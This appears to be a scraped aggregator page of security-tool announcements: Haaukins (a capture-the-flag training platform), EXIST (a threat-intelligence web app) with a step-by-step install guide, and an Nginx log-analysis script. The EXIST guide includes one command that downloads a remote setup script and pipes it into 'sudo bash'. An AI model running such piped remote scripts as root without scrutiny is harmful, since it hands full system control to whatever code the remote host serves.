    2. SecDevOps
    3. Architecture & Engineering
    4. Vulnerability, Change, & Configuration Management
    5. Quality Assurance
    6. Auditing - Processing, Systems, Applications
    7. Development - Infrastructure / Web Applications

    Mission Statement
    The ultimate expectation is to emulate the quality, format, and presentation of the Syracuse University Cyber SEED Labs while creating strategic hubs of Cyber Security Center-of-Excellence Partnerships where the gap between enterprise experience & academic learning is addressed by focusing training paths on people, products, and process.

    SEED Funding / Training Programs
    AWS Educate - Free cloud training for students w/ edu address
    AWS EdStart - $500 in AWS Credits for startup's
    Program Solicitation NSF 17-573 aims to make advancements in informal STEM learning.
    Graduate Research Fellowship Program (GRFP) - SU's Master of Cyber Security program requires a bit more funding, this is opensource - win,win,win.

    America's Seed Fund - a creative outlet

    Credits
    • Chris Long - Detection Lab
    • Omar Santos - websploit& docker scripts
    • FireEye - CommandoVM & FlareVM
    • All Github projects
    • Kali Maintainers
    • Tenable Nessus Engineers
    • This project is a fork of a well-architected terraform AWS framework -> fedekau/terraform-with-circleci-example


    Haaukins - A Highly Accessible And Automated Virtualization Platform For Security Education

    $
    0
    0

    Haaukins is a highly accessible and automated virtualization platform for security education, it has three main components (Docker, Virtualbox and Golang), the communication and orchestration between the components managed using Go programming language. The main reason of having Go environment to manage and deploy something on Haaukins platform is that Go’s easy concurrency and parallelism mechanism. Want to get more insight about architecture of Haaukins visit architecture page
    Our primary aim to involve anyone who desire to learn capturing the flag concept in cyber security which is widely accepted approach to learn how to find vulnerability on a system. Despite of all existing platform, Haaukins provides its own virtualized environment to you with operating system which designed to find vulnerabilities

    Prerequisites
    The following dependencies are required and must be installed separately in order to run daemon in your local environment.
    • Linux
    • Docker
    • Go 1.13+
    There is no prerequisites for installing client to your environment.
    Note: Linux can be used in virtualized environment as well.

    Installation
    To install daemon or client of Haaukins, there are some options, via binary files, which are ready to use, visit releases page.
    More information about installation process, checkout following pages ;
    • Installation for client
    • Configuration for daemon
      • There are some configuration files to configure daemon, those configuration files should be in same directory with the binary file that you have just downloaded from releases page.
      • Want to try daemon on you local computer with pre-configured vagrant file check out this repo for more information.

    Getting Dependencies
    Haaukins platform uses go modules since version 1.6.4, hence it is quite easy to manage dependencies, you just need to run go mod download

    Testing
    Make sure that you are in $GOPATH/src/github.com/aau-network-security/haaukins/ directory, to run all test files, following command can be used
    go test -v -short ./...

    Re-compile proto
    Haaukins platform uses gRPC on communication of client and daemon, so after updating the protocol buffer specification (i.e. daemon/proto/daemon.proto), corresponding golang code generation is done by doing the following:
    cd $GOPATH/src/github.com/aau-network-security/haaukins/daemon/
    protoc -I proto/ proto/daemon.proto --go_out=plugins=grpc:proto

    Version release
    In order to release a new version, run the script/release/release.go script as follows (choose depending on type of release):
    $ go run $GOPATH/src/github.com/aau-network-security/haaukins/scripts/release/release.go major
    $ go run $GOPATH/src/github.com/aau-network-security/haaukins/scripts/release/release.go minor
    $ go run $GOPATH/src/github.com/aau-network-security/haaukins/scripts/release/release.go patch
    The script will do the following:
    • Bump the version in VERSION and commit to git
    • Tag the current HEAD with the new version
    • Create new branch(es), which depends on the type of release.
    • Push to git
    Travis automatically creates a release on GitHub and deploys on server.
    Note: by default the script uses the ~/.ssh/id_rsa key to push to GitHub. You can override this settings by the HKN_RELEASE_PEMFILE env var.

    Credits


    EXIST - Web Application For Aggregating And Analyzing Cyber Threat Intelligence

    $
    0
    0

    EXIST is a web application for aggregating and analyzing CTI (cyber threat intelligence).
    EXIST is written by the following software.
    • Python 3.5.4
    • Django 1.11.22

    Concept
    EXIST is a web application for aggregating CTI to help security operators investigate incidents based on related indicators.
    EXIST automatically fetches data from several CTI services and Twitter via their APIs and feeds. You can cross-search indicators via the web interface and the API.
    If you have servers logging network behaviors of clients (e.g., logs of DNS and HTTP proxy servers, etc.), you will be able to analyze the logs by correlating with data on EXIST. If you implement some programs by using the API, you will realize automated CTI-driven security operation center.


    Use Cases

    Case1: Investigate domain detected by IDS
    Just type domain in the search form.


    Case2: Access the malicious URL on behalf of the user and acquire the display image of the browser and the contents to be downloaded
    Just type url in the search form.


    Case3: Monitor cyber threats
    Just add keywords in the Threat Hunter or Twitter Hunter.


    Features

    Tracker
    Tracker automatically collects data feeds from several CTI services.
    • Threat Tracker
    • Reputation Tracker
    • Twitter Tracker
    • Exploit Tracker
    • News Tracker
    • Vuln Tracker

    Hunter
    Hunter enables us to set queries for gathering data from several CTI services and Twitter.
    • Twitter Hunter
    • Threat Hunter
    • News Hunter

    Lookup
    Lookup retrieves information related to specific information (e.g. IP address, domain) from several internet services (e.g. whois).
    • IP Address
    • Domain
    • URL
    • File Hash

    Web API
    Provide data stored in the EXIST database by Web API.
    • reputation
    • twitter
    • exploit
    • threatEvent
    • threatAttribute
    • news
    • vuln

    Getting started
    After that I assume the environment of CentOS 7 or Ubuntu 18.04 LTS. Please at your own when deploying to other environment.

    Install python modules
    $ sudo pip install -r requirements.txt

    Install MariaDB
    • CentOS 7
    $ curl -sS https://downloads.mariadb.com/MariaDB/mariadb_repo_setup | sudo bash
    $ sudo yum install MariaDB-server MariaDB-client
    • Ubuntu 18.04 LTS
    $ sudo apt install mariadb-server mariadb-client

    Run database
    $ sudo systemctl start mariadb
    $ sudo systemctl enable mariadb

    Database setting

    Migrate database
    $ python manage.py makemigrations exploit reputation threat threat_hunter twitter twitter_hunter news news_hunter vuln
    $ python manage.py migrate

    Install Redis server
    Reputation tracker uses redis as the Celery cache server backend.
    • CentOS 7
    $ sudo yum install redis
    $ sudo systemctl start redis
    $ sudo systemctl enable redis
    • Ubuntu 18.04 LTS
    $ sudo apt install redis-server
    $ sudo systemctl start redis-server
    $ sudo systemctl enable redis-server

    Setup Celery
    Reputation tracker uses Celery as an asynchronous task job queue.
    • Create a celery config. I recommend that the config is set on the following paths:
      • CentOS 7: /etc/sysconfig/celery
      • Ubuntu 18.04 LTS: /etc/celery.conf
    # Name of nodes to start
    # here we have a single node
    CELERYD_NODES="w1"
    # or we could have three nodes:
    #CELERYD_NODES="w1 w2 w3"

    # Absolute or relative path to the 'celery' command:
    CELERY_BIN="/path/to/your/celery"

    # App instance to use
    # comment out this line if you don't use an app
    CELERY_APP="intelligence"
    # or fully qualified:
    #CELERY_APP="proj.tasks:app"

    # How to call manage.py
    CELERYD_MULTI="multi"

    # Extra command-line arguments to the worker
    CELERYD_OPTS="--time-limit=300 --concurrency=8"

    # - %n will be replaced with the first part of the nodename.
    # - %I will be replaced with the current child process index
    # and is important when using the prefork pool to avoid race conditions.
    CELERYD_PID_FILE="/var/run/celery/%n.pid"
    CELERYD_LOG_FILE="/var/log/celery/%n%I.log"
    CELERYD_LOG_LEVEL="INFO"
    • Create a celery service management script on /etc/systemd/system/celery.service. Also, you must set your celery config path to EnvironmentFile.
    [Unit]
    Description=Celery Service
    After=network.target

    [Service]
    Type=forking
    User=YOUR_USER
    Group=YOUR_GROUP
    EnvironmentFile=/etc/sysconfig/celery
    WorkingDirectory=/path/to/your/exist
    ExecStart=/bin/sh -c '${CELERY_BIN} multi start ${CELERYD_NODES} \
    -A ${CELERY_APP} --pidfile=${CELERYD_PID_FILE} \
    --logfile=${CELERYD_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL} ${CELERYD_OPTS}'
    ExecStop=/bin/sh -c '${CELERY_BIN} multi stopwait ${CELERYD_NODES} \
    --pidfile=${CELERYD_PID_FILE}'
    ExecReload=/bin/sh -c '${CELERY_BIN} multi restart ${CELERYD_NODES} \
    -A ${CELERY_APP} --pidfile=${CELERYD_PID_FILE} \
    --logfile=${CELERYD_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL} ${CELERYD_OPTS}'

    [Install]
    WantedBy=multi-user.target
    • Create Celery log and run directories.
    $ sudo mkdir /var/log/celery; sudo chown YOUR_USER:YOUR_GROUP /var/log/celery
    $ sudo mkdir /var/run/celery; sudo chown YOUR_USER:YOUR_GROUP /var/run/celery
    • Create a configuration file in /etc/tmpfiles.d/exist.conf
    #Type  Path               Mode  UID        GID         Age  Argument
    d /var/run/celery 0755 YOUR_USER YOUR_GROUP -
    • Run Celery
    $ sudo systemctl start celery.service
    $ sudo systemctl enable celery.service

    Run web server
    $ python manage.py runserver 0.0.0.0:8000
    • Access to http://[YourWebServer]:8000 with your browser.
    • WebAPI: http://[YourWebServer]:8000/api/
    Note: I recommend to use Nginx and uWSGI when running in production environment.

    Collect feed
    Scripts for inserting feed into database are scripts/insert2db/*/insert2db.py.

    Configure insert2db
    • Configuration files are scripts/insert2db/conf/insert2db.conf. Create it in reference to insert2db.conf.template.
    • If you use MISP, write MISP URL and API key to insert2db.conf.
    • If you use Malshare, write your API key to insert2db.conf.
    • Create your Twitter API account in https://developer.twitter.com/ for tracking with EXIST.
    • Create an App for EXIST.
    • Get Consumer API key (CA), Consumer API secret key (CS), Access token (AT), access token secret (AS).
    • Write CA, CS, AT, AS to insert2db.conf.

    Run scripts
    $ python scripts/insert2db/reputation/insert2db.py
    $ python scripts/insert2db/twitter/insert2db.py
    $ python scripts/insert2db/exploit/insert2db.py
    $ python scripts/insert2db/threat/insert2db.py
    $ python scripts/insert2db/news/insert2db.py
    $ python scripts/insert2db/vuln/insert2db.py
    Note: To automate information collection, write them to your cron.

    Setting hunter

    Twitter Hunter
    Twitter Hunter can detect tweets containing specific keywords and user ID. And you can notify slack if necessary.
    • Configuration files are scripts/hunter/conf/hunter.conf. Create it in reference to hunter.conf.template.
    • If you use slack, write your slack token to hunter.conf.
    • Create your Twitter API account in https://developer.twitter.com/.
    • Create 18 Apps for EXIST.
    • Get 18 Consumer API key (CA), Consumer API secret key (CS), Access token (AT), access token secret (AS).
    • Write CA, CS, AT, AS to auth-hunter[00-18] to hunter.conf.
    • Make scripts/hunter/twitter/tw_watchhunter.py run every minute using cron to make Twitter Hunter persistent.

    Threat Hunter
    Threat Hunter can detect threat events containing specific keywords. And you can notify slack if necessary.
    • Configuration files are scripts/hunter/conf/hunter.conf. Create it in reference to hunter.conf.template.
    • If you use slack, write your slack token to hunter.conf.
    • Make scripts/hunter/threat/th_watchhunter.py run every minute using cron to make Threat Hunter persistent.

    Other requirement tools and settings

    VirusTotal API
    EXIST uses VirusTotal API.
    • Create your VirusTotal account.
    • Write your API-key to conf/vt.conf.
    Note: You get more information if you have private API key.

    GeoIP DB
    Lookup IP / Domain uses GeoLite2 Database.

    wkhtmltopdf and Xvfb
    Lookup URL uses wkhtmltopdf and Xvfb.
    $ sudo yum install xorg-x11-server-Xvfb
    If you deploy EXIST on Ubuntu 18.04 LTS, you can install these packages by using apt.
    $ sudo apt install wkhtmltopdf xvfb

    Flush old data
    • Configuration files are scripts/url/url.conf. Create it in reference to url.conf.template.
    • Make scripts/url/delete_webdata.sh run every day using cron to flush old Lookup URL data.
    • Make scripts/url/delete_oldtaskresult.sh run every day using cron to flush old Celery data.


    Nginx Log Check - Nginx Log Security Analysis Script

    $
    0
    0

    Nginx Log Security Analysis Script

    Features
    • Statistics Top 20 Address
    • SQL injection analysis
    • Scanner alert analysis
    • Exploit detection
    • Sensitive path access
    • File contains attack
    • Webshell
    • Find URLs with response length Top 20
    • Looking for rare script file access
    • Find script file for 302 redirect

    Usage

    Set report save address outfile
    Set the log analysis directory access_dir
    Set log name access_log

    ./nginx_check.sh


    Viewing all 5854 articles
    Browse latest View live


    <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>